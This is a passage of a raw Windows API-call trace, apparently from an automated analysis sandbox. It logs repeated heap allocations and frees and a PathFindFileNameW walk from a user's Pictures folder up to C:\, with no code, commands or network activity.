dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1140 [0194.904] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0194.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0194.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1140 | out: hHeap=0x620000) returned 1 [0194.905] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.905] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.905] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.905] 